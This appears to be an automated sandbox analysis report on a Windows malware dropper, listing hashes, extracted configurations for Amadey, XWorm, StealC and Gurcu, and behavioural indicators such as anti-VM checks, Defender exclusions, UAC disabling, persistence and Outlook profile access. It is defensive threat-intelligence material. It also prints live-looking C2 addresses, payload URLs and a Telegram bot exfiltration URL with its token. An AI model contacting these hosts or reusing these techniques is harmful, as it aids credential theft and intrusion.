Analysis
-
max time kernel
96s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 23:10
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
1.8MB
-
MD5
a68bd83f0cedd6b76cca22d5853ec168
-
SHA1
ce0eae756e594d55f9a3835fb46fa82895c12c76
-
SHA256
1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125
-
SHA512
8441eb36925308b653caf7abdb34dbcb88799f14fd5fc9f11ba363206a46e83430c4caf804631b23c5dcb710da56bb691371fd5fc7a01461006387364baa85f0
-
SSDEEP
49152:44ylfSD3avYUIh0+OZiq+ZrodAR2u6EuY:47lfSDfUHwrodAR2u5F
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000200000001e761-3044.dat family_xworm behavioral2/memory/6084-3058-0x00000000004D0000-0x00000000004E8000-memory.dmp family_xworm -
Gurcu family
-
Stealc family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 41 2164 powershell.exe 42 1988 powershell.exe 50 2344 mshta.exe 52 3868 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1448 powershell.exe 5380 powershell.exe 2740 powershell.exe 6136 powershell.exe 3276 powershell.exe 2684 powershell.exe 4820 powershell.exe 232 powershell.exe 2544 powershell.exe 3276 powershell.exe 1988 powershell.exe 2164 powershell.exe 3868 powershell.exe 2544 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 1 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4720 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation document.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe -
Executes dropped EXE 11 IoCs
pid Process 3188 skotes.exe 1096 L.exe 1832 file.exe 2448 FunnyJellyfish.exe 4236 FunnyJellyfish.tmp 6084 document.exe 2756 FunnyJellyfish.exe 5148 FunnyJellyfish.tmp 5304 skotes.exe 5340 LB31.exe 4596 Mig.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe -
Loads dropped DLL 3 IoCs
pid Process 5228 regsvr32.exe 5716 regsvr32.exe 6032 regsvr32.EXE -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" document.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5860 powercfg.exe 1592 powercfg.exe 5336 powercfg.exe 3860 powercfg.exe 3404 powercfg.exe 3988 powercfg.exe 2636 powercfg.exe 3704 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000300000000073f-8908.dat autoit_exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Mig.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4364 file.exe 3188 skotes.exe 1096 L.exe 5304 skotes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2164 set thread context of 4364 2164 powershell.exe 107 PID 5340 set thread context of 6028 5340 LB31.exe 161 PID 4596 set thread context of 5828 4596 Mig.exe 194 PID 4596 set thread context of 6132 4596 Mig.exe 195 PID 4596 set thread context of 4744 4596 Mig.exe 200 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6128 sc.exe 4532 sc.exe 5892 sc.exe 5140 sc.exe 1856 sc.exe 1832 sc.exe 4544 sc.exe 6052 sc.exe 5808 sc.exe 2892 sc.exe 5548 sc.exe 6048 sc.exe 1004 sc.exe 1076 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1068 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2428 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 5248 taskkill.exe 556 taskkill.exe 364 taskkill.exe 5240 taskkill.exe 1068 taskkill.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732230700" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 21 Nov 2024 23:11:41 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8EDDE341-6043-44F9-8E11-D9E3F6A00C16}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6084 document.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4364 file.exe 4364 file.exe 3188 skotes.exe 3188 skotes.exe 1096 L.exe 1096 L.exe 2164 powershell.exe 1988 powershell.exe 2164 powershell.exe 1988 powershell.exe 3868 powershell.exe 3868 powershell.exe 3868 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 5148 FunnyJellyfish.tmp 5148 FunnyJellyfish.tmp 5380 powershell.exe 5716 regsvr32.exe 5716 regsvr32.exe 5380 powershell.exe 5716 regsvr32.exe 5380 powershell.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 232 powershell.exe 232 powershell.exe 232 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 6136 powershell.exe 6136 powershell.exe 6136 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 3276 powershell.exe 3276 powershell.exe 3276 powershell.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 5716 regsvr32.exe 6084 document.exe 6084 document.exe 5716 regsvr32.exe 5304 skotes.exe 5304 skotes.exe 5340 LB31.exe 2684 powershell.exe 